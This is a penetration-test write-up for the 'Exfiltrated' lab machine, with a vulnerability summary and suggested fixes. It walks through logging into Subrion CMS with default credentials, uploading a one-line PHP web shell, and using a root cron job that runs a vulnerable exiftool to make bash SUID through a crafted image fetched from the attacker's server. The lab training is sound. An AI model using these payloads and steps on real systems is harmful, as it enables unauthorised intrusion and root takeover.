The Subrion CMS on port 80 allows an admin user or user with admin privilege to upload files directly on the webserver without any sanitization of extensions. The attacker with admin account with weak credentials access can upload malicious file to get remote code execution that will result into shell access to the target system
Vulnerability Fix
A strong set of credentials will avoid the initial access to the admin account
Proper sanitization of the file type and updating the Subrion CMS to latest version can mitigate the problem
Severity
HIGH
Enumeration
Performing a nmap TCP Service Scan
root@kali ~/p/exfiltrated# nmap -sC -sV -O 192.168.179.163
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-20 07:17 EST
Nmap scan report for 192.168.179.163
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
...
...
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.56 seconds
The scan indicates the ports 22 and 80 to be opened. Webserver on port 80.
Webpage unreachable because of hostname. Adding the 'exfiltrated.offsec' to /etc/hosts file.
root@kali ~/p/exfiltrated# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.179.163 exfiltrated.offsec
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Refresh the webpage on port 80.
Navigating to /robots.txt
Navigating to /panel.
Panel running Subrion version 4.2.1. Searching for default credentials.
Trying the credentials admin - admin.
Click on 'Log in'.
Successfully logge in as Administrator. Now navigate to /panel
Automatically redirected to admin dashboard.
Exploitation
Navigate to Content -> Uploads
By looking the filename we can assume that the webserver only accepts filename with extension of .phar
Create an PHP RCE payload and save it in a filename called rce.phar
<?php system($_GET['cmd']); ?>
After that upload it.
After sucessfully uploading of file right click on rce.phar
Click on 'Get info'.
Click on 'rce.phar'. This will navigate to http://exfiltrated.offsec/uploads/rce.phar
To get the rce type
http://exfiltrated.offsec/uploads/rce.phar?cmd=id
Successfully got the RCE. In order to get a shell intercept the request in burp and send it to repeater. Then copy the payload, edit it with local ip and local port.
Now that the shell is properly stabalized, enumerating the target. Checking the crontab
www-data@exfiltrated:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root bash /opt/image-exif.sh
#
Crontab is running a shell script called 'image-exif.sh' every minute. Listing the contents of the 'image-exif.sh' script
www-data@exfiltrated:/tmp$ cat /opt/image-exif.sh
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne "\\n metadata directory cleaned! \\n\\n"
IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"
echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename;
do
exiftool "$IMAGES/$filename" >> $LOGFILE
done
echo -ne "\\n\\n Processing is finished! \\n\\n\\n"
In the below do-loop it is observed that the script is utitlizing a tool called exiftool. Exiftool is a free open-source software that is used for reading, writing and manupulating metadata inside image,video or PDF.
Privilege Escalation
Exiftool 7.44 is vulnerable to arbitrary code execution in which attacker can inject malicious commands inside jpg image that can be leveraged to run commands as root or modify file permissions of files as rootReference
Explanation - The syntax has been referred from the above link which will execute commands as root via 'system'. The chmod 4777 /usr/bin/bash command will give SUID permission to bash that can be executed by any user but will be run as root in the background
Compile it with djvumake and change the file name.
After successfull compilation transfer the 'exploit.jpg' to the target machine in the '/var/www/html/subrion/uploads' directory(as per the image-exif.sh script). First host a python server in the kali attacker machine.
python -m SimpleHTTPServer 80
Then on the target machine.
www-data@exfiltrated:/var/www/html/subrion/uploads$ wget http://192.168.49.179/exploit.jpg
--2021-11-20 15:18:16-- http://192.168.49.179/exploit.jpg
Connecting to 192.168.49.179:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 154 [image/jpeg]
Saving to: ‘exploit.jpg’
exploit.jpg 100%[======================================================================>] 154 --.-KB/s in 0s
2021-11-20 15:18:17 (35.4 MB/s) - ‘exploit.jpg’ saved [154/154]
After transferring wait for few minutes so that the image-exif.sh runs every minuteThen check the permission of /usr/bin/bash
www-data@exfiltrated:/var/www/html/subrion/uploads$ ls -al /usr/bin/bash
-rwsrwxrwx 1 root root 1183448 Jun 18 2020 /usr/bin/bash
The script has successfully changed the permission of /usr/bin/bash to SUID To escalate to root simply type.
